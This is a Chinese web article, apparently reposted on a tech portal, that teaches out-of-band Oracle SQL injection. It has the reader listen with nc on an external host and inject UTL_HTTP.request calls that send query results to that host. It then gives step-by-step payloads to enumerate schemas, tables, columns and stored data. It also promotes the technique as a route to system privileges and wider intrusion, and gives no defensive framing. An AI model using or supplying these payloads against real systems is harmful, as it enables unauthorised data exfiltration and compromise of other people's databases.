当前位置:  数据库>oracle

Oracle注射技术——Oracle+nc注射

    来源: 互联网  发布时间:2017-03-21

    本文导语:   首先外网nc监听对应的端口   and UTL_HTTP.request("外网ip:port/"(sql语句))=1--   爆库:   select owner from all_tables where rownum=1   select owner from all_tables where owner"第一个库名"   and rownum=1   select owner from all_tables where owner"...

  首先外网nc监听对应的端口

  and UTL_HTTP.request("外网ip:port/"(sql语句))=1--

  爆库:

  select owner from all_tables where rownum=1

  select owner from all_tables where owner"第一个库名"

  and rownum=1

  select owner from all_tables where owner"第一个库名"

  and owner"第二个"and rownum=1

  select owner from all_tables where owner"第一个库名"

  and owner"第一个库名" and rownum=1

  以此论推

  爆表

  :

  select TABLE_NAME from all_tables where owner="库名"

  and rownum=1

  select TABLE_NAME from all_tables where owner="库名"

  and rownum=1 and TABLE_NAME"表名1"

  select TABLE_NAME from all_tables where owner="库名"andrownum=1

  and TABLE_NAME"表名1" and TABLE_NAME"表名2"

  以此论推

  爆列:

  select COLUMN_NAME from user_tab_columns wheretable_name="表名"

  and rownum=1

  select COLUMN_NAME from user_tab_columns wheretable_name="表名"

  and rownum=1 and COLUMN_NAME"第一个爆出的列名"

  select COLUMN_NAME from user_tab_columns wheretable_name="表名"

  and rownum=1 and COLUMN_NAME"第一个爆出的列名"andCOLUMN_NAME"第二个爆出的列名"

  爆内容:

  第一个内容:select 列名 from 表名 where rownum=1

  第二个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"

  第三个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"and列名"第二个值"

  以此论推

  注:

  1:在windows环境下,Oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料

  2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁

  3.这是个系列文章,后文有待更新

  编辑推荐

  将Oracle内置的安全特性用于php

  Oracle Forms不安全处理临时文件漏洞


    
 
 

您可能感兴趣的文章:

  • Oracle 10g和Oracle 11g网格技术介绍
  • Oracle数据库技术(38)
  • Oracle 数据库(oracle Database)性能调优技术详解
  • Oracle数据库技术(37)
  • Oracle 12c的九大最新技术特性介绍
  • 聘请JSP/BEA/Oracle辅导老师解决技术问题
  • oracle远程复制及异地容灾的技术解决方案
  • 如何从Oracle技术支持获得更多
  • 详解如何应用改变跟踪技术加速Oracle递增备份
  • Oracle公司的据中心很大部分采用开源技术
  • Oracle如何致力于增强Linux技术
  • 基于Oracle的面向对象技术入门基础简析开发者网络Oracle
  • 入侵Oracle数据库能用到的技术
  • Oracle三种上载文件技术
  • Oracle新技术对Linux的影响
  • Oracle数据库重复数据删除技术的四大优势
  • Oracle的数据字典技术简析
  • Oracle数据库常见技术问题解答篇
  • 详解Oracle分布式系统数据复制技术
  • Oracle技术平台助力数字化城市管理进程
  • Oracle EBS R12 支持 Oracle Database 11g iis7站长之家
    •  
    本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
    本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • Oracle 12c发布简单介绍及官方下载地址
  • 在linux下安装oracle,如何设置让oracle自动启动!也就是让oracle那个服务自动启动,不是手动的
  • oracle 11g最新版官方下载地址
  • 请问su oracle 和su - oracle有什么不同?
  • Oracle 数据库(oracle Database)Select 多表关联查询方式
  • 虚拟机装Oracle R12与Oracle10g
  • Oracle数据库(Oracle Database)体系结构及基本组成介绍
  • Oracle 数据库开发工具 Oracle SQL Developer
  • 如何设置让Oracle SQL Developer显示的时间包含时分秒
  • Oracle EBS R12 支持 Oracle Database 11g
  • oracle中如何把表中具有相同值列的多行数据合并成一行
  • SCO unix下安装oracle,但没有光盘,请大家推荐一个oracle下载站点(unix版本的)。谢谢!!!!
  • ORACLE日期相关操作
  • 请问大家用oracle数据库, 用import oracle.*;下的东西么? 还是用标准库?
  • ORACLE数据库常用字段数据类型介绍
  • Linux /$ORACLE_HOME $ORACLE_HOME
  • ORACLE中DBMS_RANDOM随机数生成包
  • Linux系统下Oracle的启动与Oracle监听的启动
  • 请问在solaris下安装ORACLE,用root用户和用oracle用户安装有什么区别么?
  • 网间Oracle的连接,远程连接Oracle服务器??
  • 请教:.profile中:if [ -d /opt/oracle/db01/app/oracle/product/9.2.0 ]是什么意思?


    • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3